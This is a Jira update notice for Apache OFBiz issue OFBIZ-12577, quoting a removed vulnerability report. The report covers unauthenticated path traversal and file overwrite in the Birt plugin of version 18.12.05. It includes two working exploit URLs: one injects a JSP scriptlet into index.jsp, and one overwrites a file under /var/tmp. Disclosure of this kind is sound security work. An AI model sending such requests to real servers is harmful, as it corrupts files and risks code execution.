[
https://issues.apache.org/jira/browse/OFBIZ-12577?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Jacques Le Roux updated OFBIZ-12577:
------------------------------------
Description: (was: *Description of the vulnerability*
*Unauth Path Traversal with file corruption*
After reading a note (https://bugs.eclipse.org/bugs/show_bug.cgi?id=538142)
about a remote code execution (RCE) vulnerability in Birt, there was an attempt
to reproduce it.
https://192.168.0.13:8443/birt/output?__report=./../ordermgr/reports/
SalesReport.rptdesign&__format=pdf&__overwrite=true&__document=index.jsp&reportBy=%3C%25%0A%20%20out.println(%22OS%3A%20%22%20%2B%20System.getProperty(%22os.name
%22))%3B%0A%20%20out.println(%22Current%20dir%3A%20%22%20%2B%20getServletContext().getRealPath(%22%2F%22))%3B%0A%25%3E%0A
I rewrite the system index.jsp file
(~/apache-ofbiz-18.12.05/plugins/birt/webapp/index.jsp),
corrupting it, but the payload didn't work. Before and after making a request
from an unauthorized user.
!image-2022-02-21-15-54-00-257.png!
When accessing the script, the index server returns a 500 error.
!image-2022-02-21-15-54-51-612.png!
An unauthorized user can overwrite and corrupt files in the current folder. Can
it go beyond
the current folder and overwrite, for example, file /var/tmp/s3cReTfIle? - yes!
https://192.168.0.13:8443/birt/output?__report=./../ordermgr/reports/
SalesReport.rptdesign&__format=pdf&__overwrite=true&__document=../../../../../../../../var/tmp/s3cReTfIle&reportBy=test
!image-2022-02-21-16-00-25-840.png!)
> Pending issue
> -------------
>
> Key: OFBIZ-12577
> URL: https://issues.apache.org/jira/browse/OFBIZ-12577
> Project: OFBiz
> Issue Type: Bug
> Affects Versions: 18.12.05
> Reporter: Nikita Podotykin
> Priority: Major
> Fix For: 18.12.05
>
> Original Estimate: 72h
> Remaining Estimate: 72h
>
--
This message was sent by Atlassian Jira
(v8.20.1#820001)
